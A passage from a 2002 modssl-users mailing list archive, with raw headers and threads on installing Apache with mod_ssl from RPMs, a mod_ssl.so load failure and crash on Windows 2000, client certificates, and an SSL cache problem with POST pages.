> > Do you know if any RPM version would work correctly ?? I don't know much about the RPM environment (I usually "use the source, Luke") but I doubt very much that getting a mod_ssl aware apache is as simple as rpm -i on the packages above... For one thing, the standard apache cannot load mod_ssl like a normal module, the apache API has to be extended to allow mod_ssl access to the openssl library. This means an apache recompile with mod_ssl... Did you do something like this? In any case, you can check the status of your apache binary by doing "httpd -l" which will list the compiled in modules - do you see mod_ssl? If you are using DSO, do you get an error about the LoadModule directive or any SSL directives in the config? What do you see in the error_log when you try to start apache like this? What SSL directives do you have in the config? Do you have an SSL virtualhost defined? Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 15:14:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA18813; Wed, 3 Apr 2002 15:13:20 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns1.microanswers.net id PAA18773; Wed, 3 Apr 2002 15:12:40 +0200 (MET DST) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by ns1.microanswers.net (8.11.0/8.11.0) with SMTP id g33Dv4O08680 for ; Wed, 3 Apr 2002 07:57:04 -0600 Message-ID: <03e501c1db11$2958d8a0$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: References: <3CAAEA6B.C44A9311@etsetb.upc.es> Subject: Re: Nowhere talks about RPMS installation. Is it possible? Date: Wed, 3 Apr 2002 07:12:09 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear Sergie Mayordomo, RE:>>> Is it normal that when I try $apachectl startssl , or $httpd -SSLD it don't works at all ? ----------- In your apache home directory, e.g. /usr/local/apache, you have a few important directories (they are probably ALL important but we're only going to talk about three). 1) In the conf directory, do you have an httpd.conf? If not, then it's probably in your /etc/httpd directory. Either way, load this datafile into a text editor and examine all of your SSL statements. Make sure SSL is set up correctly. What does correctly mean? Set up so that it works. 2) In your bin directory, you have apachectl. Execute <./apachectl configtest> (there is a dot in front of the slash). Does that run cleanly. 3) In the logs directory, you have the access_log and the error_log. What, if anything, about your problem shows up in these two files? Are there any clues that you can discover that might help? Provide more infomation and maybe you can get it going. The programs work but you are still learning how to work the programs. It might take a little while. This is a "non-trivial" application. As for the RPM's I am sure thousands of people have made them work... Good Luck! Andrew Lietzow The ACL Group, Inc. ----- Original Message ----- From: "Sergi Mayordomo" To: "modssl" Sent: Wednesday, April 03, 2002 5:41 AM Subject: Nowhere talks about RPMS installation. Is it possible? > Hi, > > I have: -apache-1.3.22-2.i386.rpm, mod_ssl-2.8.5-4.i386.rpm. under > Redhat 7.2 > I have php-4.0.6-12.i386.rpm too. > Is it normal that when I try $apachectl startssl , or $httpd -SSLD it > don't works at all ? > the previous commands aren't recognized for apache. > > Do you know if any RPM version would work correctly ?? > > Thanks. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 16:53:42 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA27072; Wed, 3 Apr 2002 16:52:36 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailb.telia.com id QAA27025; Wed, 3 Apr 2002 16:51:54 +0200 (MET DST) Received: from d1o900.telia.com (d1o900.telia.com [213.66.140.241]) by mailb.telia.com (8.11.6/8.11.6) with ESMTP id g33Epqg15342 for ; Wed, 3 Apr 2002 16:51:52 +0200 (CEST) Received: from DANALIEN (h43n3fls22o900.telia.com [213.65.205.43]) by d1o900.telia.com (8.10.2/8.10.1) with SMTP id g33Eppd02575 for ; Wed, 3 Apr 2002 16:51:51 +0200 (CEST) Message-Id: <200204031451.g33Eppd02575@d1o900.telia.com> From: "Danalien" To: "modssl-users@modssl.org" Date: Wed, 03 Apr 2002 16:51:50 +0200 X-Mailer: PMMail 2000 Professional (2.20.2360) For Windows 2000 (5.0.2195;2) MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Subject: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Danalien" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I need some help, i patch, complie, and everything according to: http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL.Win32 all goes fine fine, only get a few warnings (during the apache complie) I then go to the httpd.conf (%my_apache_ssl_root%/conf) and put this in: LoadModule ssl_module modules/mod_ssl.so and I get (this) when i do apache -t : C:\Program Files\Apache_SSL>apache -t Syntax error on line 62 of c:/program files/apache_ssl/conf/httpd.conf: Cannot load c:/program files/apache_ssl/modules/mod_ssl.so into server: (182) Note the errors or messages above, and press the key to exit. 26... C:\Program Files\Apache_SSL> *thinking* *thinking*... ... then I just do a little test. remove the previos loadModule by puting a # infront (lite this): #LoadModule ssl_module modules/mod_ssl.so and add: AddModule mod_ssl.c and get : C:\Program Files\Apache_SSL>apache -t Syntax error on line 110 of c:/program files/apache_ssl/conf/httpd.conf: Cannot add module via name 'mod_ssl.c': not in list of loaded modules Note the errors or messages above, and press the key to exit. 23... C:\Program Files\Apache_SSL> and do a apache -l where I get this: Compiled-in modules: http_core.c mod_so.c mod_mime.c mod_access.c mod_auth.c mod_negotiation.c mod_include.c mod_autoindex.c mod_dir.c mod_cgi.c mod_userdir.c mod_alias.c mod_env.c mod_log_config.c mod_asis.c mod_imap.c mod_actions.c mod_setenvif.c mod_isapi.c and my suspicions were correct, "where are/is the SSL - module(s)?" cause it ain't in the compiled apache :) If some could explain/help me how to meld this SSL module into apache, it would be great :) thanks. // with regards // ID :: danalien :: PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 -----BEGIN PGP SIGNATURE----- Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and its affiliated companies. iQA/AwUBPKsI9x6FoQlEaqKIEQKKOQCfQTAK3SV7vSoe8aE8YQqv7cjVqrQAoOe7 DmQQDW2F53itoAyTwCj7zlEj =hTM+ -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 16:54:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA27175; Wed, 3 Apr 2002 16:53:38 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns1.microanswers.net id QAA27080; Wed, 3 Apr 2002 16:52:39 +0200 (MET DST) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by ns1.microanswers.net (8.11.0/8.11.0) with SMTP id g33Fb1O08868 for ; Wed, 3 Apr 2002 09:37:02 -0600 Message-ID: <040b01c1db1f$1f889b40$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: References: <3CAAE892.DCE888AA@cisco.com> Subject: Re: ModSSL 2.8.8 + Apache 1.3.24 crashing on Windows Date: Wed, 3 Apr 2002 08:52:05 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear Hassan, RE:>>Windows 2000 Not to be smart or anything but why are you trying to run a server based application on a desktop operating system? Since PC's are so cheap and Linux is so cheap, why not invest in a machine that will do what you want it to do without having to pull out all of your hair? RE:>>> "The instruction at "0x6ff90e08" referenced memory at "0x72676f76". The memory could not be read." This tells very little about the problem. Oh, I suppose the authors of these programs might be able to figure out what instruction is in that memory location at the exact time that your programs fail, but this is typical of Desktop O/S's. They give you a bomb and then hope you can figure it out. RE:>>This has become a critical issue for me! If that were true, you would already be running this on Linux... Well, maybe that's a bit strong but I am serious that source code type applications are more compatible with source code type O/S's. Do you have a vested interest in running this on Windows 2000? Is that a must do for you? IMHO, whatever is holding you back from installing this application onto Linux, you might as well deal with it and then move on ... RedHat, SuSE, Caldera, Mandrake... just do it! Andrew Lietzow The ACL Group, Inc. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 17:07:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA28598; Wed, 3 Apr 2002 17:06:40 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from portalcp2.chevron.com id RAA28510; Wed, 3 Apr 2002 17:05:40 +0200 (MET DST) Received: from chvpk-wss2.chvpk.chevrontexaco.net (chvpk-wss2.chevron.com [146.22.18.9] (may be forged)) by portalcp2.chevron.com (8.11.6/8.11.6) with SMTP id g33F5Xe26413 for ; Wed, 3 Apr 2002 07:05:33 -0800 (PST) Received: from 146.27.74.63 by chvpk-wss2.chvpk.chevrontexaco.net with ESMTP (ChevronTexaco Mail Relay (MMS v4.7)); Wed, 03 Apr 2002 07:02:24 -0800 X-Server-Uuid: 26fe3e76-19dd-11d3-be09-0008c7b1f151 Received: by chvpk-msxb1.chvpk.chevrontexaco.net with Internet Mail Service (5.5.2650.21) id ; Wed, 3 Apr 2002 07:02:24 -0800 Message-ID: <8F88657F29DFD11189ED0008C728C6B008A5A59A@nor935-msx6.nor.chevron.com> From: "Ladner, Eric (Eric.Ladner)" To: "'modssl-users@modssl.org'" Subject: RE: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) Date: Wed, 3 Apr 2002 07:02:22 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) X-WSS-ID: 10B5C60A1866883-01-01 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ladner, Eric (Eric.Ladner)" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Can you go to c:/program files/apache_ssl/modules and see the mod_ssl.so file? Your second test seems logical since the module wasn't loaded in the LoadModule section. Eric -----Original Message----- From: Danalien [mailto:danalien@datormaffian.com] Sent: Wednesday, April 03, 2002 8:52 AM To: modssl-users@modssl.org Subject: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I need some help, i patch, complie, and everything according to: http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL.Win32 all goes fine fine, only get a few warnings (during the apache complie) I then go to the httpd.conf (%my_apache_ssl_root%/conf) and put this in: LoadModule ssl_module modules/mod_ssl.so and I get (this) when i do apache -t : C:\Program Files\Apache_SSL>apache -t Syntax error on line 62 of c:/program files/apache_ssl/conf/httpd.conf: Cannot load c:/program files/apache_ssl/modules/mod_ssl.so into server: (182) Note the errors or messages above, and press the key to exit. 26... C:\Program Files\Apache_SSL> *thinking* *thinking*... ... then I just do a little test. remove the previos loadModule by puting a # infront (lite this): #LoadModule ssl_module modules/mod_ssl.so and add: AddModule mod_ssl.c and get : C:\Program Files\Apache_SSL>apache -t Syntax error on line 110 of c:/program files/apache_ssl/conf/httpd.conf: Cannot add module via name 'mod_ssl.c': not in list of loaded modules Note the errors or messages above, and press the key to exit. 23... C:\Program Files\Apache_SSL> and do a apache -l where I get this: Compiled-in modules: http_core.c mod_so.c mod_mime.c mod_access.c mod_auth.c mod_negotiation.c mod_include.c mod_autoindex.c mod_dir.c mod_cgi.c mod_userdir.c mod_alias.c mod_env.c mod_log_config.c mod_asis.c mod_imap.c mod_actions.c mod_setenvif.c mod_isapi.c and my suspicions were correct, "where are/is the SSL - module(s)?" cause it ain't in the compiled apache :) If some could explain/help me how to meld this SSL module into apache, it would be great :) thanks. // with regards // ID :: danalien :: PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 -----BEGIN PGP SIGNATURE----- Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and its affiliated companies. iQA/AwUBPKsI9x6FoQlEaqKIEQKKOQCfQTAK3SV7vSoe8aE8YQqv7cjVqrQAoOe7 DmQQDW2F53itoAyTwCj7zlEj =hTM+ -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 17:20:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA00070; Wed, 3 Apr 2002 17:19:05 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailc.telia.com id RAA29844; Wed, 3 Apr 2002 17:17:39 +0200 (MET DST) Received: from d1o900.telia.com (d1o900.telia.com [213.66.140.241]) by mailc.telia.com (8.11.6/8.11.6) with ESMTP id g33FHcg18796 for ; Wed, 3 Apr 2002 17:17:38 +0200 (CEST) Received: from DANALIEN (h43n3fls22o900.telia.com [213.65.205.43]) by d1o900.telia.com (8.10.2/8.10.1) with SMTP id g33FHad12907 for ; Wed, 3 Apr 2002 17:17:36 +0200 (CEST) Message-Id: <200204031517.g33FHad12907@d1o900.telia.com> From: "Danalien" To: "modssl-users@modssl.org" Date: Wed, 03 Apr 2002 17:17:34 +0200 X-Mailer: PMMail 2000 Professional (2.20.2360) For Windows 2000 (5.0.2195;2) In-Reply-To: <8F88657F29DFD11189ED0008C728C6B008A5A59A@nor935-msx6.nor.chevron.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Subject: RE: RE: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Danalien" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Japp, allready put it here. >Can you go to c:/program files/apache_ssl/modules and see the mod_ssl.so >file? > >Your second test seems logical since the module wasn't loaded in the >LoadModule section. > >Eric > >-----Original Message----- >From: Danalien [mailto:danalien@datormaffian.com] >Sent: Wednesday, April 03, 2002 8:52 AM >To: modssl-users@modssl.org >Subject: apache 1.3.24 + mod_ssl 2.8.8 for Windows (2000) > > >Hi, > >I need some help, i patch, complie, and everything according to: > http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL.Win32 > >all goes fine fine, only get a few warnings (during the apache complie) > >I then go to the httpd.conf (%my_apache_ssl_root%/conf) > >and put this in: > >LoadModule ssl_module modules/mod_ssl.so > > >and I get (this) when i do apache -t : > >C:\Program Files\Apache_SSL>apache -t >Syntax error on line 62 of c:/program files/apache_ssl/conf/httpd.conf: >Cannot load c:/program files/apache_ssl/modules/mod_ssl.so into server: >(182) >Note the errors or messages above, and press the key to exit. 26... >C:\Program Files\Apache_SSL> > >*thinking* *thinking*... > >... then I just do a little test. > >remove the previos loadModule by puting a # infront (lite this): > >#LoadModule ssl_module modules/mod_ssl.so > > >and add: > >AddModule mod_ssl.c > > >and get : > >C:\Program Files\Apache_SSL>apache -t >Syntax error on line 110 of c:/program files/apache_ssl/conf/httpd.conf: >Cannot add module via name 'mod_ssl.c': not in list of loaded modules >Note the errors or messages above, and press the key to exit. 23... >C:\Program Files\Apache_SSL> > > >and do a apache -l >where I get this: > >Compiled-in modules: > http_core.c > mod_so.c > mod_mime.c > mod_access.c > mod_auth.c > mod_negotiation.c > mod_include.c > mod_autoindex.c > mod_dir.c > mod_cgi.c > mod_userdir.c > mod_alias.c > mod_env.c > mod_log_config.c > mod_asis.c > mod_imap.c > mod_actions.c > mod_setenvif.c > mod_isapi.c > > >and my suspicions were correct, "where are/is the SSL - module(s)?" cause it >ain't in >the compiled apache :) > >If some could explain/help me how to meld this SSL module into apache, it >would be great :) >thanks. > > > > > > >// with regards >// ID :: danalien :: > >PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org // with regards // ID :: danalien :: PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 -----BEGIN PGP SIGNATURE----- Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and its affiliated companies. iQA/AwUBPKsO/x6FoQlEaqKIEQIOiACdFE57iQebkBg6r1wIbjJf4TOWDYIAoKwY o1SRuk++dFNMuY/7MNbsgYT5 =Z7o4 -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 17:25:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA00711; Wed, 3 Apr 2002 17:24:54 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from cisco.com id RAA00554; Wed, 3 Apr 2002 17:23:07 +0200 (MET DST) Received: from cisco.com ([192.135.242.65]) by cisco.com (8.8.8/2.6/Cisco List Logging/8.8.8) with ESMTP id UAA18692 for ; Wed, 3 Apr 2002 20:52:30 +0530 (IST) Message-ID: <3CAB1E52.E33FFCE5@cisco.com> Date: Wed, 03 Apr 2002 20:52:58 +0530 From: Hassan S Organization: HCL-Cisco X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: ModSSL 2.8.8 + Apache 1.3.24 crashing on Windows References: <3CAAE892.DCE888AA@cisco.com> <040b01c1db1f$1f889b40$4d38e63f@microanswers.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Hassan S X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks for your suggestion Andrew, but that doesn't help me ! My application should support Windows also. So, there is no way for me other than fixing this problem. Any other suggestions/experiences please? Thanks Hassan Andrew Lietzow wrote: > Dear Hassan, > RE:>>Windows 2000 > Not to be smart or anything but why are you trying to run a server based > application on a desktop operating system? Since PC's are so cheap and > Linux is so cheap, why not invest in a machine that will do what you want it > to do without having to pull out all of your hair? > > RE:>>> "The instruction at "0x6ff90e08" referenced memory at "0x72676f76". > The memory could not be read." > This tells very little about the problem. Oh, I suppose the authors of > these programs might be able to figure out what instruction is in that > memory location at the exact time that your programs fail, but this is > typical of Desktop O/S's. They give you a bomb and then hope you can figure > it out. > > RE:>>This has become a critical issue for me! > If that were true, you would already be running this on Linux... Well, > maybe that's a bit strong but I am serious that source code type > applications are more compatible with source code type O/S's. Do you have a > vested interest in running this on Windows 2000? Is that a must do for you? > IMHO, whatever is holding you back from installing this application onto > Linux, you might as well deal with it and then move on ... RedHat, SuSE, > Caldera, Mandrake... just do it! > > Andrew Lietzow > The ACL Group, Inc. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 19:37:27 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA10143; Wed, 3 Apr 2002 19:01:51 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id SAA09841; Wed, 3 Apr 2002 18:58:56 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 2A5EB4CE729; Wed, 3 Apr 2002 18:58:53 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g33FwwT30548; Wed, 3 Apr 2002 17:58:58 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from gate2-b.volkswagen.de id KAA29035; Wed, 3 Apr 2002 10:01:53 +0200 (MET DST) Received: (from smtpd@localhost) by gate2-b.volkswagen.de (8.9.1a/8.9.1) id KAA11603 for ; Wed, 3 Apr 2002 10:01:51 +0200 (MET DST) Received: from Volkswagen by relay2.volkswagen.de, id smtpdAAA0iw_ca; Wed Apr 3 10:01:37 2002 Received: by devwagwodx0053.wob.vw.de with Internet Mail Service (5.5.2653.19) id ; Wed, 3 Apr 2002 10:01:35 +0200 Message-ID: <5C260D5A6C0DD4118F340008C791EE1424590F@devwagwodx0011.wob.vw.de> From: "Hertha, Maik (Hartmann + Hertha)" To: "'modssl-users@modssl.org'" Subject: AW: Creating client certificates ? Date: Wed, 3 Apr 2002 10:01:20 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA29050 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Hertha, Maik (Hartmann + Hertha)" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users you are not right. there are lot of resources. you should look here: http://www.modssl.org/docs/2.8/ssl_faq.html mit freundlichem Gruß / best regards Maik Hertha -------------------------------------------------------------- h+h EBSP Anwenderbetreuung, +49 5361 9-74950 Volkswagen AG / Brieffach 1721 / D-38436 Wolfsburg http://ebsp.wob.vw.de maik.hertha@volkswagen.de -------------------------------------------------------------- hartmann+hertha it (beratung / entwicklung / support) http://www.hartmann-hertha.de mhertha@hartmann-hertha.de -------------------------------------------------------------- h+h > -----Ursprüngliche Nachricht----- > Von: jmos@gmx.net [SMTP:jmos@gmx.net] > Gesendet am: Mittwoch, 3. April 2002 03:56 > An: modssl-users@modssl.org > Betreff: Creating client certificates ? > > Hello modssl users ! > > I managed to set up an ssl aware web server. > Although I searched the web and also the list > archive I haven't been able to create a client > certificate which is signed by my own CA for > client authentication. > > Could someone describe the process of creating > such a certificate in detail ? > > I know it is possible with openssl but as I said > before I wasn't able to figure out how. > > Please help ! > > -- > GMX - Die Kommunikationsplattform im Internet. > http://www.gmx.net > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 19:38:00 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA10175; Wed, 3 Apr 2002 19:02:12 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id SAA09846; Wed, 3 Apr 2002 18:58:58 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 60A184CE74C; Wed, 3 Apr 2002 18:58:53 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g33FxCl30560; Wed, 3 Apr 2002 17:59:12 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns.designlinks.net id LAA04654; Wed, 3 Apr 2002 11:47:51 +0200 (MET DST) Received: from ayakub (host213-1-88-16.in-addr.btopenworld.com [213.1.88.16]) by ns.designlinks.net (8.10.2/8.10.2) with SMTP id g339vVc10360 for ; Wed, 3 Apr 2002 10:57:31 +0100 Received: by localhost with Microsoft MAPI; Wed, 3 Apr 2002 10:50:20 +0100 Message-ID: <01C1DAFD.5963FA70.shiraz.esat@designlinks.net> From: Shiraz Esat To: "'modssl-users@modssl.org'" Subject: RE: SSL cache issue Date: Wed, 3 Apr 2002 10:50:19 +0100 X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shiraz Esat X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Jeremy et al, Server-side: Linux, Apache 1.3.20, mod_ssl 2.8.4, OpenSSL 0.9.6b, PHP 4.1.2. Client-side: Win2000, IE5.5. Surely this is a server-side problem? Or, at least, surely there must be a 'fix' server-side? After all, do we need to tell all site-visitors to fix their browsers? Thanks in advance, Shiraz -----Original Message----- From: Jeremy Walton [SMTP:jeremyw@dicecorp.com] Sent: Tuesday, April 02, 2002 10:00 PM To: modssl-users@modssl.org Subject: RE: SSL cache issue Actually I've had this problem. I may have the solution for you if you can tell me what OS your running the client from and what browser. Jeremy Walton DICE Corporation -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Shiraz Esat Sent: Tuesday, April 02, 2002 4:10 AM To: 'modssl-users@modssl.org' Subject: RE: SSL cache issue Terry, If anyone passes you a solution, can you please pass it on to me as well, as I have the same problem :( [Only difference, though, is that I'm using PHP generated pages] Thanks in advance Shiraz -----Original Message----- From: Terry Ziemniak [SMTP:terry.ziemniak@swc.com] Sent: Friday, March 29, 2002 9:31 PM To: 'modssl-users@modssl.org' Subject: SSL cache issue I am getting 'page not found errors' the first time I access certain JSP pages (though there are others that always work). If I refresh the page displays correctly. Notes: 1. This only happens over HTTPS, never over HTTP 2. Netscape (v 4.2) displayed the error "Data Missing. This document resulted from a POST operation and has expired from the cache. If you wish you can repost the form data to create the document by pressing the reload button." 3. Apache's access.log seems to validate point 2. The last line before an error is a POST. The retry shows a POST followed shortly by anther GET and POST of the same JSP. 4. I have not yet been able to exactly describe 'First time'. General rule of them, if I repeat the process within 15 minutes it seems OK. If I wait an hour it should fail. Though quantifying that has not been my highest priority. 5. I am running Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32 and Resin 1.2.8. Any help would be appreciated. Terry Ziemniak << File: ATT00002.htm >> ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 19:38:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA10188; Wed, 3 Apr 2002 19:02:30 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id SAA09849; Wed, 3 Apr 2002 18:58:59 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 79DDA4CE758; Wed, 3 Apr 2002 18:58:53 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g33FxFo30566; Wed, 3 Apr 2002 17:59:15 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns.designlinks.net id MAA05663; Wed, 3 Apr 2002 12:06:47 +0200 (MET DST) Received: from ayakub (host213-1-88-16.in-addr.btopenworld.com [213.1.88.16]) by ns.designlinks.net (8.10.2/8.10.2) with SMTP id g33A9qc10863 for ; Wed, 3 Apr 2002 11:09:52 +0100 Received: by localhost with Microsoft MAPI; Wed, 3 Apr 2002 11:02:41 +0100 Message-ID: <01C1DAFF.133E4C10.shiraz.esat@designlinks.net> From: Shiraz Esat To: "'modssl-users@modssl.org'" Subject: RE: SSL cache issue Date: Wed, 3 Apr 2002 11:02:40 +0100 X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shiraz Esat X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users David and others, Why would a JSP (or PHP, or any dynamically created page) resolve their URL differently from a 'static' page? If page A, static.html, has a 